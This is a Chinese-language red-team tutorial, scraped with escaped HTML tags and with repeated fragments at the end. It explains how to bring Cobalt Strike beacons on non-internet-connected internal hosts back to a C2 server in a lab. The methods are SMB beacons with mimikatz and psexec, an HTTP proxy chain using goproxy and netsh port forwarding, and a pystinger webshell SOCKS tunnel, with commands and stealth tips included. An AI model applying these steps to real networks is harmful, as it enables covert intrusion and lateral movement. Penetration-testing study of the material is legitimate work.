不出网主机上线方法详解<\/h1>

测试环境配置<\/h2>

公网IP段<\/strong>: 192.168.111.0\/24<\/li>

内网IP段<\/strong>: 192.168.204.0\/24<\/li> <\/ul>
主机配置<\/h3>

Web服务器<\/strong><\/p>

系统: Windows 2008 R2<\/li>
角色: DMZ主机<\/li>
网络配置:

两块网卡: NAT模式 + HOSTONLY模式<\/li>
可通外网<\/li>
公网IP: 192.168.111.132<\/li>
内网IP: 192.168.204.188<\/li> <\/ul> <\/li> <\/ul> <\/li>

内网主机<\/strong><\/p>

系统: Windows 2012<\/li>
网络配置:

HOSTONLY模式<\/li>
不通外网<\/li>
内网IP: 192.168.204.141<\/li> <\/ul> <\/li> <\/ul> <\/li>

C2服务器<\/strong><\/p>

系统: Kali Linux<\/li>
公网IP: 192.168.111.129<\/li> <\/ul> <\/li> <\/ol>
方法一：SMB Beacon<\/h2>
原理<\/h3>
SMB Beacon使用命名管道通过父级Beacon进行通讯，流量封装在SMB协议中，相对隐蔽。<\/p>
使用条件<\/h3>

目标主机必须开放445端口<\/li>
只能链接由同一个Cobalt Strike实例管理的Beacon<\/li>
必须有目标主机的管理员权限或凭据<\/li> <\/ol>
操作步骤<\/h3>

首先获取内网中一台主机的beacon<\/li>
使用mimikatz抓取密码<\/li>
对目标主机进行SMB喷射，获取administrator账户密码<\/li>
建立SMB beacon listener<\/li>
使用psexec横向移动，选择现有beacon作为跳板

必须使用administrator凭据<\/li> <\/ul> <\/li>
连接成功后，smb beacon上线的主机右侧会有∞∞标识<\/li> <\/ol>
方法二：HTTP代理上线<\/h2>
使用工具<\/h3>
goproxy (proxy.exe)<\/p>
操作步骤<\/h3>

上传proxy.exe到web服务器<\/li>
在8080端口开启HTTP代理:
C:\proxy.exe http -t tcp -p "0.0.0.0:8080" --daemon <\/code><\/pre> <\/li> 使用netsh命令进行端口转发: netsh interface portproxy add v4tov4 listenaddress=192.168.204.188 listenport=822 connectaddress=192.168.111.132 connectport=8080 <\/code><\/pre> 注意: 822端口必须未被使用<\/li> <\/ul> <\/li> 检查端口是否启用: netstat -ano | findstr :822 <\/code><\/pre> <\/li> 创建listener并配置: 类型: HTTP<\/li> 主机: C2服务器IP<\/li> 端口: 8080<\/li> 代理设置: 使用web服务器作为代理<\/li> <\/ul> <\/li> 生成stageless payload 区别: stager: 分阶段，第一阶段申请内存，第二阶段请求shellcode<\/li> stageless: 包含所有文件，避免shellcode传输问题<\/li> <\/ul> <\/li> <\/ul> <\/li> 连接过程: 192.168.204.141 → 192.168.204.188:822 → 192.168.111.132:8080 → C2 <\/code><\/pre> <\/li> <\/ol> 方法三：pystinger搭建SOCKS4代理<\/h2> 原理<\/h3> 服务端由webshell和stinger_server.exe构成<\/li> webshell负责流量转发<\/li> stinger_server.exe处理连接和数据<\/li> 本质是搭建SOCKS4代理<\/li> <\/ul> 操作步骤<\/h3> 上传proxy.php到网站目录正常访问应返回UTF-8<\/li> <\/ul> <\/li> 上传stinger_server.exe并执行: start stinger_server.exe 0.0.0.0 <\/code><\/pre> <\/li> 在Kali上执行客户端: .\/stinger_client -w http:\/\/192.168.111.132:81\/proxy.php -l 127.0.0.1 -p 60000 <\/code><\/pre> <\/li> CS中新建listener: 主机: 192.168.204.188 (web服务器内网IP)<\/li> 端口: 60020 (转发端口)<\/li> <\/ul> <\/li> 使用psexec横向移动，选择stinger作为listener<\/li> <\/ol> 关键注意事项<\/h2> 端口选择<\/strong>:<\/p> 确保转发端口未被占用<\/li> 避免使用常见服务端口<\/li> <\/ul> <\/li> 权限要求<\/strong>:<\/p> SMB beacon必须使用管理员权限<\/li> 横向移动需要有效凭据<\/li> <\/ul> <\/li> payload选择<\/strong>:<\/p> 网络不稳定环境建议使用stageless<\/li> 隐蔽性要求高时考虑SMB beacon<\/li> <\/ul> <\/li> 代理设置<\/strong>:<\/p> 确保代理链各环节连通<\/li> 测试每个节点的连接性<\/li> <\/ul> <\/li> 隐蔽性<\/strong>:<\/p> SMB流量比HTTP更隐蔽<\/li> 代理可以混淆真实C2地址<\/li> <\/ul> <\/li> <\/ol> 参考资源<\/h2> Cobalt Strike Listener with Proxy<\/li> 红队攻防实践:不出网主机搭建内网隧道新思路<\/li> DNS与SMB beacon详解与一种内网穿透方法的实践<\/li> <\/ol>

不出网主机上线方法详解<\/h1>

方法一：SMB Beacon<\/h2>

原理<\/h3> SMB Beacon使用命名管道通过父级Beacon进行通讯，流量封装在SMB协议中，相对隐蔽。<\/p>

方法二：HTTP代理上线<\/h2>

使用工具<\/h3> goproxy (proxy.exe)<\/p>

方法三：pystinger搭建SOCKS4代理<\/h2>

参考资源<\/h2> Cobalt Strike Listener with Proxy<\/li> 红队攻防实践:不出网主机搭建内网隧道新思路<\/li> DNS与SMB beacon详解与一种内网穿透方法的实践<\/li> <\/ol>

原理<\/h3>
SMB Beacon使用命名管道通过父级Beacon进行通讯，流量封装在SMB协议中，相对隐蔽。<\/p>

使用工具<\/h3>
goproxy (proxy.exe)<\/p>

参考资源<\/h2>

Cobalt Strike Listener with Proxy<\/li>
红队攻防实践:不出网主机搭建内网隧道新思路<\/li>
DNS与SMB beacon详解与一种内网穿透方法的实践<\/li> <\/ol>